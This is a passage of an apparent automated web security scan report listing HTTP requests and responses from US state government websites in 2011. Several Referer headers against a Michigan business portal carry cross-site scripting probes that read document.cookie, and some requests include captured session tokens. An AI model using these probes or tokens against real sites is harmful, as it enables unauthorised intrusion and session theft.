Confidence:   Certain
Host:   http://legis.delaware.gov
Path:   /Lookup/disclaimer

Request

GET /Lookup/disclaimer HTTP/1.1
Host: legis.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sat, 30 Apr 2011 12:22:05 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Sat, 30 Apr 2011 12:22:05 GMT
Content-Type: text/html
Content-Length: 159

<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>

28.23. http://legis.delaware.gov/Lookup/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.delaware.gov
Path:   /Lookup/faq

Request

GET /Lookup/faq HTTP/1.1
Host: legis.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sat, 30 Apr 2011 12:22:05 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Sat, 30 Apr 2011 12:22:05 GMT
Content-Type: text/html
Content-Length: 159

<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>

28.24. http://legis.delaware.gov/Lookup/permissions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.delaware.gov
Path:   /Lookup/permissions

Request

GET /Lookup/permissions HTTP/1.1
Host: legis.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sat, 30 Apr 2011 12:22:08 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Sat, 30 Apr 2011 12:22:08 GMT
Content-Type: text/html
Content-Length: 159

<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>

28.25. http://legis.delaware.gov/images/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.delaware.gov
Path:   /images/spacer.gif

Request

GET /images/spacer.gif HTTP/1.1
Host: legis.delaware.gov
Proxy-Connection: keep-alive
Referer: http://legis.delaware.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sat, 30 Apr 2011 00:38:33 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Sat, 30 Apr 2011 00:38:33 GMT
Content-Type: text/html
Content-Length: 159

<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>

28.26. http://legis.state.la.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.state.la.us
Path:   /

Request

GET / HTTP/1.1
Host: legis.state.la.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 515
Content-Type: text/html
Content-Location: http://legis.state.la.us/home.htm
Last-Modified: Sun, 14 Jun 2009 20:37:11 GMT
Accept-Ranges: bytes
ETag: "2c83eee42fedc91:107d"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:37:14 GMT

<html>

<head>
<title>Louisiana Legislature</title>
<LINK REL="SHORTCUT ICON" HREF="http://www.legis.state.la.us/images/state.ico">
</head>

<frameset rows="124,*" border="0" framespacing="0" f
...[SNIP]...

28.27. http://legis.state.la.us/contact.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.state.la.us
Path:   /contact.htm

Request

GET /contact.htm HTTP/1.1
Host: legis.state.la.us
Proxy-Connection: keep-alive
Referer: http://legis.state.la.us/main.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCAARADRS=JFJCGLCAOPDHMMCLHBDKEGHL; ASPSESSIONIDCAAQBDQT=ONIDGLCADOJCAKFMFOLBBCLG; ASPSESSIONIDCCCTDCRT=EBCKINPCCNNOHGAFIOJDEKPH

Response

HTTP/1.1 200 OK
Content-Length: 5444
Content-Type: text/html
Last-Modified: Wed, 07 Apr 2010 02:32:26 GMT
Accept-Ranges: bytes
ETag: "10c99f8ffad5ca1:107d"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:02:48 GMT

<html>
<head>
<title>Contact the Webmasters</title>
<style>a:link { color: #0000ff; text-decoration: none }
a:visited { color: #660099; text-decoration: none }
a:hover { color: #ff0
...[SNIP]...

28.28. http://legis.state.la.us/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.state.la.us
Path:   /index.htm

Request

GET /index.htm HTTP/1.1
Host: legis.state.la.us
Proxy-Connection: keep-alive
Referer: http://legis.state.la.us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 5432
Content-Type: text/html
Last-Modified: Sun, 14 Jun 2009 20:35:47 GMT
Accept-Ranges: bytes
ETag: "30d3f0b22fedc91:107d"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:37:14 GMT

<html>
<head>
<title>Louisiana Legislature</title>
<LINK REL="SHORTCUT ICON" HREF="http://www.legis.state.la.us/images/state.ico">


</head>

<body>
<SCRIPT Language="Javascript">
// Change
...[SNIP]...

28.29. http://legis.state.la.us/main.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.state.la.us
Path:   /main.asp

Request

GET /main.asp HTTP/1.1
Host: legis.state.la.us
Proxy-Connection: keep-alive
Referer: http://legis.state.la.us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:37:17 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 203694
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCCTDCRT=NMAKINPCDDLANNNKMKLOBMEG; path=/
Cache-control: private


<HTML>
<HEAD>
<META HTTP-EQUIV=Refresh CONTENT=300>
<TITLE>Louisiana Legislature Home Page</TITLE>
<LINK REL="SHORTCUT ICON" HREF="http://www.legis.state.la.us/images/state.ico">


<script
...[SNIP]...

28.30. https://license.ohio.gov/lookup/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://license.ohio.gov
Path:   /lookup/default.asp

Request

GET /lookup/default.asp HTTP/1.1
Host: license.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:22:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16380
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCASDBT=LEIBCKOBGPFJHLNMJNJCFAIA; path=/
Cache-control: private


<HTML>
<HEAD>
<link rel="stylesheet" type="text/css" href="/css/color_scheme.css">
<link rel="stylesheet" type="text/css" href="/css/main.css">
<title>License Search</title>

<SCRIPT ID=clie
...[SNIP]...

28.31. http://mi.gov/iit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mi.gov
Path:   /iit

Request

GET /iit HTTP/1.1
Host: mi.gov
Proxy-Connection: keep-alive
Referer: http://mi.gov/taxes
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:40:02 GMT
Server: IBM_HTTP_Server
Accept-Ranges: bytes
Content-Length: 311
Content-Type: text/html

<!-- Vignette V6 Thu Jan 27 16:03:51 2011 -->
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.0 Transitional//EN'><html><head><title>Treasury Individual Income Tax Redirect</title><META http-equiv='refresh'
...[SNIP]...

28.32. http://mi.gov/unemployment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mi.gov
Path:   /unemployment

Request

GET /unemployment HTTP/1.1
Host: mi.gov
Proxy-Connection: keep-alive
Referer: http://mi.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:37:09 GMT
Server: IBM_HTTP_Server
Accept-Ranges: bytes
Content-Length: 294
Content-Type: text/html

<!-- Vignette V6 Sat Jan 22 15:41:32 2011 -->
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.0 Transitional//EN'><html><head><title>DLEG UIA Unemployment Redirect</title><META http-equiv='refresh' content=
...[SNIP]...

28.33. https://myalaska.state.ak.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myalaska.state.ak.us
Path:   /

Request

GET / HTTP/1.1
Host: myalaska.state.ak.us
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:10:31 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8o
Last-Modified: Fri, 14 Sep 2007 20:06:42 GMT
ETag: "6bd4-54-43a1dfe524c8a"
Accept-Ranges: bytes
Content-Length: 84
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
<head>
<META HTTP-EQUIV=REFRESH CONTENT="0; URL=/home/app">
</head>
</html>


28.34. http://ncchildcaresearch.dhhs.state.nc.us/search.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ncchildcaresearch.dhhs.state.nc.us
Path:   /search.asp

Request

GET /search.asp HTTP/1.1
Host: ncchildcaresearch.dhhs.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:43:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 70584
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACTBSQRB=KNOKANEBGOHFMJLJBNCLEOCJ; path=/
Cache-control: private

<!-- Setting up the data source. To change the Data Source used in this website,
change the DSN_Name -->


<html>
<head>
<title>NC Div of Child Development- Searching Resources in Child Care </
...[SNIP]...

28.35. http://ok.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ok.gov
Path:   /

Request

GET / HTTP/1.1
Host: ok.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:40 GMT
Server: Apache
Last-Modified: Sat, 30 Apr 2011 10:30:03 GMT
ETag: "c28199-12a21-4a22045f240c0"
Accept-Ranges: bytes
Content-Length: 76321
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<!-- Use IE7 mode -->
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
...[SNIP]...

28.36. https://onestop.michigan.gov/OneStop/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /OneStop/a

Request

GET /OneStop/a HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/OneStop/ssoNeedPassword.do4c601--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E687572642ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AMWEBJCT!%2Fonestop-main!JSESSIONID=00019ZIYB-FVRKrzIwI-8cI81wk:-D00MP

Response

HTTP/1.1 200 OK
content-length: 7389
content-type: text/html
date: Sat, 30 Apr 2011 12:27:42 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.1.1.1 (Build 110202)
cache-control: no-cache
pragma: no-cache
Set-Cookie: PD-S-SESSION-ID-M=2_0_kUmUzvWxa29ffb+KB9WrHnipWl6pPoxQj6N-OyOoeWRBIG+E; Path=/; Secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html >
<head>
   <title>Michigan Business One Stop- Login</title>
   <link rel="stylesheet" type="text/css" href
...[SNIP]...

28.37. https://onestop.michigan.gov/css/none  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /css/none

Request

GET /css/none HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/onestop-main/OneStop/obDesiredBiz.do?dispatchCommand=preprocess
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD-S-SESSION-ID-M=2_0_K6WGDkiKA3PMVW10ldzkXmbuPYJIXsdlsERHrZd63x0IV9Ed; IV_JCT=%2Fonestop-main; AMWEBJCT!%2Fonestop-main!JSESSIONID=0001uBkti1276B3IGohGJh7atYM:-D00MP

Response

HTTP/1.1 200 OK
content-length: 7389
content-type: text/html
date: Sat, 30 Apr 2011 12:29:41 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.1.1.1 (Build 110202)
cache-control: no-cache
pragma: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html >
<head>
   <title>Michigan Business One Stop- Login</title>
   <link rel="stylesheet" type="text/css" href
...[SNIP]...

28.38. https://onestop.michigan.gov/images/imgBanBG.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /images/imgBanBG.gif

Request

GET /images/imgBanBG.gif HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/onestop-main/OneStop/obDesiredBiz.do?dispatchCommand=preprocess
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD-S-SESSION-ID-M=2_0_K6WGDkiKA3PMVW10ldzkXmbuPYJIXsdlsERHrZd63x0IV9Ed; IV_JCT=%2Fonestop-main; AMWEBJCT!%2Fonestop-main!JSESSIONID=0001uBkti1276B3IGohGJh7atYM:-D00MP

Response

HTTP/1.1 200 OK
content-length: 7389
content-type: text/html
date: Sat, 30 Apr 2011 12:29:41 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.1.1.1 (Build 110202)
cache-control: no-cache
pragma: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html >
<head>
   <title>Michigan Business One Stop- Login</title>
   <link rel="stylesheet" type="text/css" href
...[SNIP]...

28.39. https://onestop.michigan.gov/onestop-main/OneStop/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/a

Request

GET /onestop-main/OneStop/a HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do157a1--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ed3792cda3df
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD-S-SESSION-ID-M=2_0_K6WGDkiKA3PMVW10ldzkXmbuPYJIXsdlsERHrZd63x0IV9Ed; AMWEBJCT!%2Fonestop-main!JSESSIONID=0001uBkti1276B3IGohGJh7atYM:-D00MP

Response

HTTP/1.1 200 OK
content-length: 7389
content-type: text/html
date: Sat, 30 Apr 2011 12:28:15 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.1.1.1 (Build 110202)
cache-control: no-cache
pragma: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html >
<head>
   <title>Michigan Business One Stop- Login</title>
   <link rel="stylesheet" type="text/css" href
...[SNIP]...

28.40. https://onestop.michigan.gov/onestop-main/OneStop/obDesiredBiz.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/obDesiredBiz.do

Request

GET /onestop-main/OneStop/obDesiredBiz.do?dispatchCommand=preprocess HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do157a1--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ed3792cda3df
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD-S-SESSION-ID-M=2_0_K6WGDkiKA3PMVW10ldzkXmbuPYJIXsdlsERHrZd63x0IV9Ed; IV_JCT=%2Fonestop-main; AMWEBJCT!%2Fonestop-main!JSESSIONID=0001uBkti1276B3IGohGJh7atYM:-D00MP

Response

HTTP/1.1 200 OK
content-length: 7389
content-type: text/html
date: Sat, 30 Apr 2011 12:29:19 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.1.1.1 (Build 110202)
cache-control: no-cache
pragma: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html >
<head>
   <title>Michigan Business One Stop- Login</title>
   <link rel="stylesheet" type="text/css" href
...[SNIP]...

28.41. http://orangoo.com/AmiNation/AJS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://orangoo.com
Path:   /AmiNation/AJS

Request

GET /AmiNation/AJS HTTP/1.1
Host: orangoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Fri, 29 Apr 2011 21:18:49 GMT
Content-Type: text/html
Content-Length: 571
Connection: close

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.52</center>
</body>
</html>
<!-- a padding to disable MSIE
...[SNIP]...

28.42. http://pa.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pa.gov
Path:   /

Request

GET / HTTP/1.1
Host: pa.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Location: http://pa.gov/default.htm
Last-Modified: Tue, 14 Feb 2006 21:59:26 GMT
Accept-Ranges: bytes
ETag: "033b3ebb131c61:e2b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 29 Apr 2011 22:49:32 GMT
Content-Length: 153

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<html>
<head>
<meta HTTP-EQUIV="Refresh" CONTENT="0; url=/portal/server.pt?">
</head>
</html>

28.43. https://portal.s4web.state.mn.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal.s4web.state.mn.us
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: portal.s4web.state.mn.us
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmb=205212754; __utmc=205212754; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BIGipServerprodss-SWIFT_https=520792256.35867.0000; web2-80-PORTAL-PSJSESSIONID=K4yZN7vCLYHmSmZ61lt95PGKpxvt51Zd!-1405169941; ExpirePage=https://portal.s4web.state.mn.us/psp/por91ssap/; PS_LOGINLIST=https://portal.s4web.state.mn.us/por91ssap; PS_TOKEN=pwAAAAQDAgEBAAAAvAIAAAAAAAAsAAAABABTaGRyAk4AcQg4AC4AMQAwABRoxgm+6pefEQHwP4IRzFA21F6QGmcAAAAFAFNkYXRhW3icHYpLCoAwDAXHKi7Fi1T81M9WsLpShAouPYP383A+mpAZ8pIXyFKTJPJniFUGPDszjpObhdxzsFGcBFYuHuW6ttQ0ais7sZNtzCpNHzmIA5O2jlFf/KlQC+o=; SignOnDefault=; https%3a%2f%2fportal.s4web.state.mn.us%2fpsp%2fpor91ssap%2fselfservice%2fentp%2frefresh=list:||; PS_TOKENEXPIRE=30_Apr_2011_11:15:39_GMT

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:17:55 GMT
Content-Length: 1214
Content-Type: text/html
X-Powered-By: Servlet/2.5 JSP/2.1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

28.44. http://public.leginfo.state.ny.us/menugetf.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://public.leginfo.state.ny.us
Path:   /menugetf.cgi

Request

GET /menugetf.cgi HTTP/1.1
Host: public.leginfo.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
MIME-Version: 1.0
Date: Sat, 30 Apr 2011 12:24:25 GMT
Server: ESAWEB 3.7.0.0/ESASSL 4.1.0.0 Velocity Software, Inc. on z/VM V5R3.0
Content-location: HTTP://public.leginfo.state.ny.us/menugetf.cgi
Content-type: text/html
Content-Length: 341

<HTML>
<HEAD>
<TITLE>Bill Status Search by Bill Number </TITLE>
</HEAD>

<frameset framespacing="1" border=1 frameborder="1"
ROWS="30%,67%" BORDERCOLOR=BLACK >
<FRAME NAME="TOP" src="frmlo
...[SNIP]...

28.45. http://services.ito.state.il.us/agencycomponents/getBPFeatures.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.ito.state.il.us
Path:   /agencycomponents/getBPFeatures.cfm

Request

GET /agencycomponents/getBPFeatures.cfm HTTP/1.1
Host: services.ito.state.il.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server:
Date: Sat, 30 Apr 2011 12:28:18 GMT
X-Powered-By: ASP.NET
Connection: close
Content-type: text/html
Page-Completion-Status: Normal


               document.write("<script>var featuresErrorMsg=\"Error: Agency Code for dynamic State Features is missing.\";var amberAlertSampleText=\"\\n\\nThis is the dynamic Amber Alert sample aler
...[SNIP]...

28.46. http://tools.google.com/service/update2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tools.google.com
Path:   /service/update2

Request

GET /service/update2 HTTP/1.1
Host: tools.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: c=ANcH4TKUdxmpWO4wKYcDrb1DQhG1VdZXi387pTx0GthmqQKfuW3Pz4t_wvHNJYuVK3gTrAtanAwIPcY3wxnfQbuk3vGtoCExVA;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sat, 30 Apr 2011 12:28:45 GMT
Expires: Sat, 30 Apr 2011 12:28:45 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<html><head>
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {font-size: 10pt; font-family: arial,sans-serif}
span.nav {font-size: 10p
...[SNIP]...

28.47. https://treas-secure.treas.state.mi.us/eservice_enu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://treas-secure.treas.state.mi.us
Path:   /eservice_enu/

Request

GET /eservice_enu/ HTTP/1.1
Host: treas-secure.treas.state.mi.us
Connection: keep-alive
Referer: http://www.michigan.gov/taxes/0,1607,7-238-43513-157514--,00.html
